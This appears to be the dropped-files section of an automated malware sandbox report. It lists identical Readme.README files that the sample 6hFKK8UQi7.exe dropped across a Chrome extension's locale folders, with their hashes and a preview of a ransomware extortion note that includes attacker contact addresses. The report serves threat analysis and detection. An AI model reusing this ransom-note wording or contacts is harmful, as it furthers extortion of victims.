                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_GB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_US\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  The same file was dropped by the same process at each of the following paths, with File Type, Category, Size, Entropy, Encrypted, SSDEEP, MD5, SHA1, SHA-256, SHA-512, Malicious and Preview identical to the record above:
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fi\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fil\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fr\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\he\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hi\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hu\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\id\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\it\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ja\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ko\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lt\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lv\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ms\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\nl\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\no\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pl\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_BR\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_PT\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ro\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sk\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sl\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sr\Readme.README
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_TW\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
